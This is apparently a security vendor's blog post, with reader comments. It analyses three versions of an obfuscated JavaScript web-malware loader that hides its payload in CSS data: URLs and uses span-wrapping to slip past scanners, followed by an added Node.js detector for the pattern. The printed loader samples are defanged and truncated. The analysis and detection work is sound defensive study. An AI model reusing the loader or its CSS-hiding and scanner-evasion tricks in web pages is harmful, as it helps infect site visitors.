• Web-Malware with a Sense of Style

    Web-based malware is quite interesting in the way it changes. This emerging threat can destroy the reputation of websites and online businesses, get them blacklisted by search engines and hurt their customers and visitors. Every single day, close to 6,600 new websites are added to popular malware blacklists. In this article, we will discuss the evolution of a particular piece of web-malware which is being used by hackers worldwide and which has been modified over time to avoid detection.

    Web-malware is malicious computer code, like computer viruses, but injected into web pages on unsuspecting benign websites. The owners of these websites, for the most part, remain blissfully unaware that they are hurting their customers and visitors by infecting them with malware. By virtue of being party to the malware distribution network, these legitimate websites are ultimately blacklisted by search engines, various filters and end up inaccessible to their users until they are cleaned up. This leads to loss of revenue, loss of reputation and tremendous heartache.

    Malware Evolution
    We observe many new strains of web-malware every day. One interesting strain, which has been recurring over the past year or so, is presented in this article. We will show you how this strain of malware has “evolved.” The reason for this evolution is to let the malware avoid detection by scanning systems.

    The technology we use at Stopthehacker.com (STH), however, does not work like traditional Anti-Virus software. We can detect each version of this malware, even though each version may look and act a little differently from earlier ones. Scanning technology at STH uses Machine Learning and Artificial Intelligence techniques to hunt down malware and even spam on web pages. We protect the reputation of websites and prevent loss of business due to blacklisting.

    Let’s look at each version of the web-malware below.

    Version 1:
    Also found on jsunpack.

    <skript>var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC='';var b=i[gP].cssRules||i[gP].rules;aV="";var cW=42678;for(var n=0;n<b.length;n++){this.rS=54312;yJ='';this.mB=29481;var xM=function(){return 'xM'};var q=b.item?b.item(n):b[n];nI=10959;vE=46645;var bG=function(){return 'bG'};var p="p";if(!q.selectorText.match(/#c(\d+)/))continue;var nE='';var gT=new Array();w=q.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];this.lE="";mG=41875;};var gH=function(){};var e=false;}gG="gG";var cB=28236;var zE=55721;bJ=false;var j="";function jI(){};var cO='';c=function(){return {oZUd:"split"}}().oZUd;gB="gB";sG=48086;var jA=function(){};this.tH=false;var m=w;</skript>
    

    Version 2:
    Found on rexbd.net.

    <span style="color:#0000BB"><skript></span>var WnmaQ={YYSXc:function(){l=<span style="color:#DD0000">&#039;&#039;</span>;var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS=<span style="color:#DD0000">"mS"</span>;var s=false;this.zN=false;var u=<span style="color:#DD0000">""</span>;var o = g.getMonth();var r = <span style="color:#DD0000">"from"</span> + g.getMonth() + <span style="color:#DD0000">"e"</span>;function t(){};d=<span style="color:#DD0000">&#039;&#039;</span>;r = r.replace(10, <span style="color:#DD0000">"CharCod"</span>);a=<span style="color:#DD0000">""</span>;this.bX=<span style="color:#DD0000">&#039;&#039;</span>; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA=<span style="color:#DD0000">""</span>;var x=false;for(var gP=0;gP <span style="color:#0000BB">< <span style="color:#007700">i.length;gP++){this.tT=false;var fU=<span style="color:#DD0000">"fU"</span>;this.nT=62782;var jC=<span style="color:#DD0000">&#039;&#039;</span>;var b=i[gP].cssRules||i[gP].rules;aV=<span style="color:#DD0000">""</span>;var cW=42678;for(var n=0;n<b.length;n++){this.rS=54312;yJ=<span style="color:#DD0000">&#039;&#039;</span>;this.mB=29481;var xM=function(){return <span style="color:#DD0000">&#039;xM&#039;</span>};var q=b.item?b.item(n):b[n];nI=10959;vE=46645;var bG=function(){return <span style="color:#DD0000">&#039;bG&#039;</span>};var p=<span style="color:#DD0000">"p"</span>;if(!q.selectorText.match(/#c(\d+)/))continue;var nE=<span style="color:#DD0000">&#039;&#039;</span>;var gT=new Array();w=q.style.backgroundImage.match(/url\(<span style="color:#DD0000">"?data\:[^,]*,([^"</span>)]+)<span style="color:#DD0000">"?\)/)[1];this.lE="</span><span style="color:#DD0000">";mG=41875;};var gH=function(){};var e=false;}gG="</span>gG<span style="color:#DD0000">";var cB=28236;var zE=55721;bJ=false;var j="</span><span style="color:#DD0000">";function jI(){};var cO=&#039;</span><span 
style="color:#DD0000">&#039;;c=function(){return {oZUd:"</span>split<span style="color:#DD0000">"}}().oZUd;gB="</span>gB<span style="color:#DD0000">";sG=48086;var jA=function(){};this.tH=false;var m=w;
    

    Version 3:
    Found on www.twosixandbrush.com (https://badwarebusters.org/main/itemview/24057).

    <style>#c19{background:url(data:,8,17.5,29.5,38,36.5,20,43,14,6.5,46.5,49,23,15,6.5,6,6,14,14,29,14.5,45,22,27,7,32.5,51.5,44.5,25,13.5,40.5,8.5,14,15,4,11,20,11,34.5,15,43,47,15,7,9.5,3.5,21.5,20.5,24,14,28.5,26.5,13.5,19,7.5,9,29.5,13.5,26.5,8.5,9.5,33,14,18,25,18,38,3,18.5,9.5,40,32,33.5,42.5,38.5,23.5,14.5,6,7,13.5,38,19,33.5,20,5,27,12,12,8.5,2.5,14,42,38,20,20.5,18,30.5,12,44,16.5,13,8,29.5,43,44,14,11,16,38.5,22,42.5,3.5,32.5,23.5,9,25,5.5,5,5.5,6,11.5,49.5,44,41,25,12.5,3.5,45,24,42.5,9,8.5,43,16,40,52,33,3,25.5,41.5,30,28.5,44.5,5.5,16.5,14,26.5,38.5,29.5,11,6.5,19,36.5,34.5,26.5,34,20,27.5,5.5,6.5,19.5,20.5,16.5,15.5,13.5,7,9.5,25,23,10,14.5,32,23.5,28.5,49.5,23.5,19,5,12,27,2);}</style>
    <skript>var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC='';var b=i[gP].cssRules||i[gP].rules;aV="";var cW=42678;for(var n=0;n<b.length;n++){this.rS=54312;yJ='';this.mB=29481;var xM=function(){return 'xM'};var q=b.item?b.item(n):b[n];nI=10959;vE=46645;var bG=function(){return 'bG'};var p="p";if(!q.selectorText.match(/#c(\d+)/))continue;var nE='';var gT=new Array();w=q.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];this.lE="";mG=41875;};var gH=function(){};var e=false;}gG="gG";var cB=28236;var zE=55721;bJ=false;var j="";function jI(){};var cO='';c=function(){return {oZUd:"split"}}().oZUd;gB="gB";sG=48086;var jA=function(){};this.tH=false;var m=w;

    Analysis
    Notice the difference between the variants. In the second example, the entire payload is wrapped with style information. This obfuscation is intended to fool scanners which analyze only the code within the script tag: if they fail to make sense of the entire block of code, they will identify it as just another benign HTML style element. The third case is one where the payload sits slightly outside the main block of malware code, in a separate style element. In this situation the scanner must correlate the presence of the “pseudo-style” information with the actual malware code and mark the entire block as unsafe. The scanner technology at STH does exactly this.
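    The correlation described above, as an added example that is not code from the original post or from STH: a small static check (Node.js) that looks for the two halves of this loader, a `#c<digits>` style rule carrying a numeric `data:` URL and a script that walks `document.styleSheets` to read it back, and only calls a page malicious when both are present. It also strips the syntax-highlighting spans and HTML entities seen in Version 2 before matching, so the wrapped form is handled the same way as the plain one. The feature regexes, the 16-value threshold and the three sample documents are this example's own assumptions.

```javascript
// Added example, not code from the original post or from Stopthehacker (STH).
// Static check that correlates the two halves of the loader shown above:
// a <style> rule for a #c<digits> selector whose background is a data: URL of
// comma-separated numbers (the "pseudo-style" payload), and a script that walks
// document.styleSheets to read that URL back out.
// The feature regexes, the 16-value threshold and the sample documents are
// this example's own assumptions, not anything published with the post.

// #cNN { ... background: url(data:,<numbers>) ... }
const STYLE_PAYLOAD_RE =
  /#c(\d+)\s*\{[^}]*background(?:-image)?\s*:\s*url\(\s*["']?data:[^,)]*,([^)"']+)["']?\s*\)/gi;

// Script-side features. Each alone is ordinary JavaScript; together, and next
// to a matching #cNN rule, they are the loader the Analysis section describes.
const SCRIPT_FEATURES = {
  walksStyleSheets: /document\.styleSheets/,
  readsRules: /\.cssRules\s*\|\|\s*\w+\[\w+\]\.rules/,
  matchesCSelector: /selectorText\.match\(\/#c\(\\d\+\)\//,
  extractsDataUrl: /backgroundImage\.match\(\/url/,
  splitsPayload: /["']split["']/,
};

// Version 2 hides the script inside syntax-highlighting spans and HTML
// entities; undo both so the feature regexes see plain source.
function normalizeScript(src) {
  return src
    .replace(/<\/?span\b[^>]*>/gi, '')
    .replace(/&#0*39;/g, "'")
    .replace(/&quot;/g, '"')
    .replace(/&lt;/g, '<')
    .replace(/&gt;/g, '>')
    .replace(/&amp;/g, '&');
}

// Every #cNN data: payload in the page, with a value count and a numeric-only flag.
function findStylePayloads(html) {
  const found = [];
  for (const m of html.matchAll(STYLE_PAYLOAD_RE)) {
    const values = m[2].split(',').map((v) => v.trim()).filter(Boolean);
    found.push({
      id: m[1],
      count: values.length,
      numeric: values.every((v) => /^-?\d+(\.\d+)?$/.test(v)),
    });
  }
  return found;
}

// Names of the loader features found in any script block (the post's samples
// are defanged as <skript>; that spelling is accepted too).
function scriptFeatureHits(html) {
  const hits = new Set();
  const scriptRe = /<s[ck]ript\b[^>]*>([\s\S]*?)<\/s[ck]ript>/gi;
  for (const m of html.matchAll(scriptRe)) {
    const body = normalizeScript(m[1]);
    for (const [name, re] of Object.entries(SCRIPT_FEATURES)) {
      if (re.test(body)) hits.add(name);
    }
  }
  return [...hits];
}

// Correlate the style payload and the loader script into one verdict.
function assessPage(html) {
  const payloads = findStylePayloads(html).filter((p) => p.numeric && p.count >= 16);
  const hits = scriptFeatureHits(html);
  const loader = ['walksStyleSheets', 'matchesCSelector', 'extractsDataUrl']
    .every((f) => hits.includes(f));
  let verdict = 'clean';
  if (loader && payloads.length > 0) verdict = 'malicious';
  else if (loader || payloads.length > 0) verdict = 'suspicious';
  return { payloads, hits, verdict };
}

// Constructed samples: a shortened loader and made-up payload numbers.
// Version 3 layout: payload in its own <style>, loader in a plain <script>.
const SAMPLE_V3 = `<html><head>
<style>#c19{background:url(data:,8,17.5,29.5,38,36.5,20,43,14,6.5,46.5,49,23,15,6.5,6,6,14,14,29,14.5);}</style>
</head><body>
<script>var i=document.styleSheets;for(var gP=0;gP<i.length;gP++){var b=i[gP].cssRules||i[gP].rules;for(var n=0;n<b.length;n++){var q=b.item?b.item(n):b[n];if(!q.selectorText.match(/#c(\\d+)/))continue;w=q.style.backgroundImage.match(/url\\("?data\\:[^,]*,([^")]+)"?\\)/)[1];}}c="split";</script>
</body></html>`;
// Version 2 layout: the same loader wrapped in color spans and entities.
const SAMPLE_V2 = `<style>#c7{background:url(data:,3,5.5,8,12,19,21.5,30,33,40,41.5,44,48,50,51.5,52,53.5,7,9);}</style>
<span style="color:#0000BB"><script></span>var i=document.styleSheets;for(var gP=0;gP <span style="color:#0000BB">< <span style="color:#007700">i.length;gP++){var b=i[gP].cssRules||i[gP].rules;for(var n=0;n<b.length;n++){var q=b.item?b.item(n):b[n];if(!q.selectorText.match(/#c(\\d+)/))continue;w=q.style.backgroundImage.match(/url\\(<span style="color:#DD0000">"?data\\:[^,]*,([^"</span>)]+)<span style="color:#DD0000">"?\\)/)[1];</span>}}c=function(){return {oZUd:<span style="color:#DD0000">&quot;split&quot;</span>}}().oZUd;</script>`;
// Benign page: a real data: image and a harmless use of document.styleSheets.
const SAMPLE_BENIGN = `<html><head>
<style>#c1{background:url(data:image/gif;base64,R0lGODlhAQABAAAAACw=);}</style>
</head><body>
<script>var n=document.styleSheets.length;document.title='sheets: '+n;</script>
</body></html>`;

for (const [name, html] of Object.entries({ SAMPLE_V3, SAMPLE_V2, SAMPLE_BENIGN })) {
  const r = assessPage(html);
  console.log(name, r.verdict, 'features:', r.hits.join(','), 'payloads:', r.payloads.length);
}
```

    Run with `node` on a saved copy of a page; the benign sample shows why the verdict is built on the correlation rather than on either half alone: a CSS data: image or a script touching `document.styleSheets` is ordinary on its own, and only the pair scores as malicious.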

    Conclusion
    Authors of web-malware are trying harder to hide their code. This may be the effect of increased capability in scanning technologies and raised awareness among webmasters and web surfers, making it more difficult for malicious hackers to do their deeds. This is a good sign.

    Till next time.

    • I have a question about version 2: can IE run this kind of sample?

      alert(1); ……

      Posted by someone on February 9th

    • How does this malware get on to the pages?

      Posted by andy on April 12th

    • These pieces of malware have two main ways to enter a site: stealing FTP credentials by means of a trojan program installed on personal computers and sniffing for passwords, and being pushed into websites when automated bots working for malicious hackers exploit vulnerabilities in third-party software installed by website admins, such as OSCommerce shopping carts, OpenX ad servers... and more.

      Posted by anirban on April 13th